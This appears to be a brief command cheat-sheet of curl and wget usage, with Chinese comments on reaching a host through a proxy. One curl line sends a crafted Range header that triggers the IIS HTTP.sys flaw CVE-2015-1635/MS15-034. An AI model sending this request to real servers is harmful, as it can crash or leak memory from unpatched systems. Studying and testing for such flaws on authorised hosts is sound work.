curl
curl -v www.test.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615" #CVE-2015-1635/MS15-034 curl -x 10.1.4.xx:8080 http://test.com #使用代理访问
wget
wget -e “http_proxy=10.1.4.xx:8080″ http://test.com #通过代理访问